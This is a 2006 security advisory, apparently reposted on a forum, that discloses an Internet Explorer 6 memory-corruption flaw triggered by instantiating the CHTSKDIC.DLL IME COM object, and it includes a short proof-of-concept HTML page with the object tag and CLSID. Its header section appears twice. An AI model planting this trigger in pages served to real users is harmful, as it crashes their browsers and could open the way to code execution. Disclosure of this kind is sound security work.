Advisory Name:
Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability
Release Date:
08/15/2006
Tested on:
Internet Explorer 6.0 SP1 on Microsoft Windows XP SP2 CN
Affected version:
Internet Explorer 6.0
Author:
nop <nop#xsec.org>
http://www.xsec.org
Overview:
A vulnerability has been found in Internet Explorer 6.0. When Internet Explorer tries to instantiate the CHTSKDIC.DLL (Microsoft IME) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker may DoS and possibly could execute arbitrary code.
XSec-06-03
Advisory Name:
Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability
Release Date:
08/15/2006
Tested on:
Internet Explorer 6.0 SP1 on Microsoft Windows XP SP2 CN
Affected version:
Internet Explorer 6.0
Author:
nop <nop#xsec.org>
http://www.xsec.org
Overview:
A vulnerability has been found in Internet Explorer 6.0. When Internet Explorer tries to instantiate the CHTSKDIC.DLL (Microsoft IME) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker may DoS and possibly could execute arbitrary code.
Exploit:
=============== CHTSKDIC.DLL.htm start ================
<!--
// Internet Explorer (CHTSKDIC.DLL) COM Object Instantiation Vulnerability
// tested XP SP2 CN
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {BE4191FB-59EF-4825-AEFC-109727951E42}
// Info: ImeSingleKanjiDict// ProgID: ID2
// InprocServer32: C:\WINDOWS\IME\CHTIME\APPLETS\CHTSKDIC.DLL
!-->
<html><body>
<object classid="CLSID:{BE4191FB-59EF-4825-AEFC-109727951E42}" ></object>
</body></html>
=============== CHTSKDIC.DLL.htm end ==================
Link:
http://www.xsec.org/index.php?module=releases&act=view&type=1&id=9
About XSec:
We are redhat.
[ reply ]